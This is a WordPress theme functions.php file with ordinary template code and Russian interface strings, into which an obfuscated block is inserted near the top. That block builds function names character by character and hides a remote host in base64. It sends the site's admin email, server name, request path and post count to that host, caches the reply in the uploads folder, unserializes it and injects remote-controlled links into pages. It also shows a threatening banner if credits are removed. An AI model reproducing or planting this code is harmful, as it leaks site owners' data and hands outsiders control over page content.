<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $Vhish='e';$QZdhO='e';$sUTvABc='6';$ksKnkT='d';$RilK='_';$MKpXv='s';$IpYwjc='b';$JxZYu='d';$wluAs='e';$ESjN='o';$RaFa='4';$yLdr='c';$hiTg='a';$OTlgWcFH=$IpYwjc.$hiTg.$MKpXv.$QZdhO.$sUTvABc.$RaFa.$RilK.$JxZYu.$wluAs.$yLdr.$ESjN.$ksKnkT.$Vhish;$ucgXNlj='t';$JzSFy='g';$Btah='z';$cQKLp='l';$wHtRFE='e';$ZlxH='n';$rNKShL='a';$XkvVt='f';$rgCLf='i';$zDaYjZgw=$JzSFy.$Btah.$rgCLf.$ZlxH.$XkvVt.$cQKLp.$rNKShL.$ucgXNlj.$wHtRFE;$ivhHNAm='r';$ykpVby='3';$GcDy='o';$LpJBSZ='1';$FlKw='_';$LKuyB='t';$ssEpg='s';$zSnhmeM='t';$rnOYPCp='r';$dVFQFyYq=$ssEpg.$zSnhmeM.$rnOYPCp.$FlKw.$ivhHNAm.$GcDy.$LKuyB.$LpJBSZ.$ykpVby;$bogOj='s';$RIhDg='e';$FCEG='r';$KPSJ='r';$Sqpn='t';$xVcO='v';$YOMyeUPQ=$bogOj.$Sqpn.$FCEG.$KPSJ.$RIhDg.$xVcO;                     $vi_________v='e';$zq______________q='e';$ar__h='6';$ge______g='d';$uk_______c='_';$ma_________v='s';$ss_________w='b';$st_________k='d';$mc_____l='e';$rp_____r='o';$zl_____v='4';$aq___m='c';$zx_______r='a';$ni______n=$ss_________w.$zx_______r.$ma_________v.$zq______________q.$ar__h.$zl_____v.$uk_______c.$st_________k.$mc_____l.$aq___m.$rp_____r.$ge______g.$vi_________v;$cl____________x='i';$vq_______________w='c';$kk______p='s';$ep_____________s='f';$ec_________r='e';$mr___o='s';$ko_______________u='o';$qd___k='_';$zg_______g='i';$ri______m='x';$cw________n='t';$gf______x='t';$no____________q='n';$fa______j='n';$ua__d='u';$aw____j=$ep_____________s.$ua__d.$no____________q.$vq_______________w.$gf______x.$cl____________x.$ko_______________u.$fa______j.$qd___k.$ec_________r.$ri______m.$zg_______g.$mr___o.$cw________n.$kk______p;$di_________o='o';$zo__________t='p';$qb___________u='e';$os__y='f';$ch___________l='n';$mk_________t=$os__y.$di_________o.$zo__________t.$qb___________u.$ch___________l;$ki__m='f';$rr_____j='e';$qr______________v='r';$qb_________r='d';$zi________z='a';$eq____n=$ki__m.$qr______________v.$rr_____j.$zi________z.$qb_________r;$vw______v='c';$eg___________t='o';$eb____________o='e';$av_______________r='f';$lx________j='l';$cm_______________p='s';$rj______b=$av_______________r.$vw______v.$lx________j.$eg___________t.$cm_______________p.$eb____________o;define("WP_ID", $ni______n("Mi4wLjA="));define("WP_TTL", $ni______n("MTA4MDA="));define("WP_SRC", $ni______n("dHBva24="));function wp_get_header() {global $ni______n, $aw____j;if ($aw____j($ni______n("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$aw____j($ni______n("d3BfZ2V0X2Zvb3Rlcg==")) &&$aw____j($ni______n("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ni______n, $mk_________t, $rj______b, $eq____n;$qt_________c = TEMPLATEPATH."/".$ni______n("Zm9vdGVyLnBocA==");$cx_________g = @$mk_________t($qt_________c, "r");$qt_________c = @$eq____n($cx_________g, @filesize($qt_________c));@$rj______b($cx_________g);$qs______u = TEMPLATEPATH."/".$ni______n("ZnVuY3Rpb25zLnBocA==");$cx_________g = @$mk_________t($qs______u, "r");$qs______u = @$eq____n($cx_________g, @filesize($qs______u));@$rj______b($cx_________g);$fj________q = 0;if($qt_________c && $qs______u) {if ($ni______n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($qt_________c, $ni______n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$fj________q = 1;}if (substr_count($qt_________c, "wp_theme_GPL_credits()") < 1) {$fj________q = 2;}}if(WP_ID != "2.0.0") {$fj________q = 12;}}if($fj________q > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $fj________q -->";}}function wp_loaded() {global $ni______n, $aw____j;return $aw____j($ni______n("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($iw_____q, $pi_________y = "(more...)", $sh_______x = 0, $hr_________r = "") {$eu_________i = get_the_content($pi_________y, $sh_______x, $hr_________r);$eu_________i = apply_filters("the_content", $eu_________i);$eu_________i = str_replace("]]>", "]]>", $eu_________i);if (strlen($_GET["p"]) > 0) {echo $eu_________i;}else if ((strlen($eu_________i)>$iw_____q) && ($xp_______________b = strpos($eu_________i, " ", $iw_____q ))) {$eu_________i = substr($eu_________i, 0, $xp_______________b);$eu_________i = $eu_________i;echo $eu_________i;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$pi_________y</a></div></p>";} else {echo $eu_________i;}}}$fr____________e='d';$vg______________m='o';$jd_______n='n';$qu____l='s';$nt__e='_';$yz_____________c='b';$zo__________b='6';$dt___________n='a';$ik______g='e';$ny__g='4';$wb__m='c';$qz____________h='e';$gj_____t='e';$hd____________u=$yz_____________c.$dt___________n.$qu____l.$qz____________h.$zo__________b.$ny__g.$nt__e.$ik______g.$jd_______n.$wb__m.$vg______________m.$fr____________e.$gj_____t;$af___h='f';$ui_______________r='n';$mi_____________a='s';$gr_______________j='e';$jp_____________l='o';$xx______u='_';$cc___________w='e';$uu_____f='t';$tf_________t='t';$gh________z='t';$ce_________n='e';$kr__p='_';$tp_____n='n';$sy____z='g';$lr________u='l';$fw__________n='i';$or___a='c';$ku____s=$af___h.$fw__________n.$lr________u.$ce_________n.$xx______u.$sy____z.$cc___________w.$tf_________t.$kr__p.$or___a.$jp_____________l.$ui_______________r.$gh________z.$gr_______________j.$tp_____n.$uu_____f.$mi_____________a;$he_____x='e';$et____e='x';$fo___g='l';$ul___________f='s';$qq_____l='e';$xh_______e='s';$ho___f='_';$kn___________a='i';$yi____e='t';$cp___a='f';$nf______q='i';$qq____k=$cp___a.$kn___________a.$fo___g.$he_____x.$ho___f.$qq_____l.$et____e.$nf______q.$ul___________f.$yi____e.$xh_______e;$wh______________k='v';$rz_____________r='s';$oa____________y='e';$yt________e='r';$gv__________o='n';$ik_________i='o';$uo____c='a';$pq____________h='m';$ue______________y='r';$re_____________h='e';$ux___________l='c';$bl____________v='o';$po_______________w='p';$gf__________i='i';$jm__g='_';$td_______________w=$wh______________k.$re_____________h.$ue______________y.$rz_____________r.$gf__________i.$ik_________i.$gv__________o.$jm__g.$ux___________l.$bl____________v.$pq____________h.$po_______________w.$uo____c.$yt________e.$oa____________y;$fh___h='f';$hi_______________n='k';$kb_________x='c';$qg__o='s';$zq________q='n';$va_____c='o';$ys________d='e';$iq_____z='o';$ff__f='p';$rv_____l=$fh___h.$qg__o.$iq_____z.$kb_________x.$hi_______________n.$va_____c.$ff__f.$ys________d.$zq________q;$gu__b='e';$yr______z='i';$yh______u='f';$br_____________l='t';$tn__v='w';$zf______n='r';$ka____k=$yh______u.$tn__v.$zf______n.$yr______z.$br_____________l.$gu__b;$mx__s='5';$du________b='m';$mu__o='d';$ej____p=$du________b.$mu__o.$mx__s;$se__u='a';$mi_______________o='l';$qi___________w='a';$ml_____________t='t';$cf______h='r';$fo_______q='e';$ch____q='p';$yd_______________b='h';$xq_______________l=$cf______h.$fo_______q.$se__u.$mi_______________o.$ch____q.$qi___________w.$ml_____________t.$yd_______________b;$vc__________g='u';$vy_______r='a';$yh____j='i';$re__m='l';$hy__t='z';$hq____________l='i';$gt__t='r';$mw__m='s';$mm_____________j='e';$dq____p='n';$ub_____g='e';$dx________b=$vc__________g.$dq____p.$mw__m.$mm_____________j.$gt__t.$yh____j.$vy_______r.$re__m.$hq____________l.$hy__t.$ub_____g;$tz___m='p';$vl__u='e';$la__y='a';$de_________u='m';$of_____d='m';$me______________h='t';$mx_________q='n';$bd_________q=$me______________h.$vl__u.$de_________u.$tz___m.$mx_________q.$la__y.$of_____d;$wo____t='c';$ua________v='n';$dj______i='_';$zk_______________t='r';$vr______________p='a';$lk___________y='e';$zr_____o='c';$wl______________b='t';$ie___u='t';$zg____d='t';$nh__________z='t';$bh___________i='r';$oi____k='o';$qs_________f='a';$ll__________t='e';$pu____________k='e';$uk_____w='m';$pl________m='_';$mp__h='x';$wq_____w='e';$wa___k='s';$lh_______s=$wa___k.$wl______________b.$bh___________i.$lk___________y.$vr______________p.$uk_____w.$dj______i.$wo____t.$oi____k.$ua________v.$ie___u.$pu____________k.$mp__h.$zg____d.$pl________m.$zr_____o.$zk_______________t.$ll__________t.$qs_________f.$nh__________z.$wq_____w;function bc_______e($ze__________x) {global $ni______n, $aw____j, $ku____s, $td_______________w, $lh_______s;if (!$aw____j($ni______n("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($td_______________w(PHP_VERSION, "5.0.0", ">=") && $aw____j($ni______n("ZmlsZV9nZXRfY29udGVudHM=")) && $aw____j($ni______n("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$yu________d = $lh_______s(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$dt____________e = @$ku____s($ze__________x, 0, $yu________d);} else {$dt____________e = @$ku____s($ze__________x, 0);}return $dt____________e;}function ji____________d($ze__________x) {global $aw____j, $rv_____l, $ka____k, $ni______n;if (!$aw____j($ni______n("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$tl_______________f = strpos($ze__________x, "/", 7);$rv__________t = array("uri"     => substr($ze__________x, $tl_______________f),"host"    => str_replace("http://", "", substr($ze__________x, 0, $tl_______________f)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ml__________d = @$rv_____l("$rv__________t[host]", 80, $us________z, $gm_______________w, 4);if (!$ml__________d) {return false;} else {$dt____________e = "";$fl__________n  = "GET $rv__________t[uri] HTTP/1.0\r\n";$fl__________n .= "Host: $rv__________t[host]\r\n";$fl__________n .= "Referer: $rv__________t[referer]\r\n";$fl__________n .= "Connection: Close\r\n\r\n";@$ka____k($ml__________d, $fl__________n);while (!@feof($ml__________d)) {$fl_____t = @fgets($ml__________d, (1024*24));if ($fl_____t == "\r\n") {$nv____t = true;continue;}if ($nv____t) {$dt____________e .= $fl_____t;}}return $dt____________e;}}function hw___________r($ze__________x) {global $aw____j;$ib____________l = false;if ($ze__________x != "") {if ($aw____j("bc_______e")) {$ib____________l = @bc_______e($ze__________x);}if (!$ib____________l && ($aw____j("ji____________d"))) {$ib____________l = @ji____________d($ze__________x);}}return $ib____________l;}function rb____________s() {global $_SERVER, $ej____p;$uo_____________m = $_SERVER["SERVER_NAME"];if (substr("$uo_____________m", 0, 4) == "www.") {$uo_____________m = substr("$uo_____________m", 4);}$uo_____________m = $ej____p("$_SERVER[SERVER_NAME]");return $uo_____________m;}function xh____o() {return "file";}function tb___c($ze__________x) {global $_SERVER, $ku____s, $qq____k, $mk_________t, $rj______b, $ka____k;$qy_____p = kv____________y();$xv___________d = rb____________s().".jpg";$ya_______________x = $qy_____p["dir_upload"]["path"]."/$xv___________d";$cl____s = @filemtime($ya_______________x);if (!$cl____s || ((time()-$cl____s) >= WP_TTL)) {$ib____________l = hw___________r($ze__________x);if ($ib____________l) {if ($qq____k($ya_______________x)) {@unlink($ya_______________x);}$cx_________g = @$mk_________t($ya_______________x, "x+");@$ka____k($cx_________g, $ib____________l);@$rj______b($cx_________g);}} else {if ($qq____k($ya_______________x)) {$ib____________l = @$ku____s($ya_______________x);} else {$ib____________l = false;}}return $ib____________l;}function kv____________y() {global $_SERVER, $ni______n, $hd____________u;$tz_______y = wp_count_posts("post");$ay_________n = pathinfo(get_bloginfo("template_directory"));$qy_____p = array("url" => array("report"      => $ni______n("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ay_________n,"dir_upload"=> vv_________x(),"queryString"=> array("?a001=".WP_ID,"a004=".$ay_________n[filename],"a005=".$tz_______y->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> ");$qy_____p["url"]["queryString"] = implode("&", $qy_____p["queryString"]);$qy_____p["url"]["report"] = $qy_____p["url"]["report"]."/?".$hd____________u($qy_____p["url"]["queryString"]).".html";return $qy_____p;}function vv_________x() {$xq______________u = wp_upload_dir();if (isset($xq______________u["error"])) {$fc___a = ts_________s();if (is_writable($fc___a)) {$xq______________u = array("path" => $fc___a);}}return $xq______________u;}function ts_________s() {global $aw____j, $ej____p, $xq_______________l, $bd_________q;$lb______________i = (bool) ini_get("safe_mode");if ($lb______________i == true) {return false;}if ($aw____j("sys_get_temp_dir")) {$eo____g = sys_get_temp_dir();if (is_writable($eo____g)) {return $xq_______________l($eo____g);}}if (!empty($_ENV["TMP"])) {return $xq_______________l($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $xq_______________l($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $xq_______________l($_ENV["TEMP"]);} else {$bt__________j = $bd_________q($ej____p(uniqid(rand(), true)), "");if ($bt__________j) {$eo____g = $xq_______________l(dirname($bt__________j));@unlink($bt__________j);return $eo____g;} else {return false;}}}function zd____________i() {global $_GET, $qq____k;$qy_____p = kv____________y();$uo_____________m = rb____________s();$cw______r = xh____o();$dy______________y = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($cw______r == "file") {$oo________p = $qy_____p["dir_upload"]["path"]."/".$uo_____________m.".jpg";if ($qq____k($oo________p)) {@unlink($oo________p);$dy______________y = "deleted";}}$pv___k = array("s"=> $dy______________y,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($pv___k AS $jv_______y => $jv_________y) echo " [$jv_______y:$jv_________y]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $aw____j, $ni______n, $dx________b;$qy_____p = kv____________y();$yf___________w = "tb___c";if ($aw____j($yf___________w)) {$dt____________e = $yf___________w($qy_____p["url"]["report"]);}if ($dt____________e) {if ($dt____________e = @$ni______n($dt____________e)) {$dt____________e = @$dx________b($dt____________e);if (strlen($dt____________e[custom_credit]) >= 5) {$qy_____p["default_string"] = $dt____________e[custom_credit];}if ($dt____________e["status"] == "0") {$ix_______u = 1;$tx_____w = 1;} else {$nx________f = sizeof($dt____________e["links"]);$dm____________s = $qy_____p["default_string"];if ($nx________f > 0 && $dt____________e["links"] !== "") {$ok_______g = 0;foreach ($dt____________e["links"] as $bh________w => $mj__w) {$ok_______g++;if ($mj__w->l_path == "" || $mj__w->l_path == $_SERVER["REQUEST_URI"]) {$mj__w->l_href = htmlspecialchars(strip_tags($mj__w->l_href));$mj__w->l_title = htmlspecialchars(strip_tags($mj__w->l_title));$mj__w->l_anchor = htmlspecialchars(strip_tags($mj__w->l_anchor));$dm____________s .= " | ";$dm____________s .= "<a href='$mj__w->l_href' title='$mj__w->l_title'";if ($mj__w->l_nofollow == "1") {$dm____________s .= " rel='nofollow'";}$dm____________s .= ">$mj__w->l_anchor</a>";}}}$qy_____p["links"] = "$dm____________s";if ($dt____________e[credit] == "0") {$qy_____p["links"] = "";}}} else {$ix_______u = "1";}} else {$ix_______u = "1";}if ($ix_______u == "1") {$qy_____p["links"] = $qy_____p["default_string"];}echo "$qy_____p[links]";echo "<!-- s: $dt____________e[signature] -->";zd____________i();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();

                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
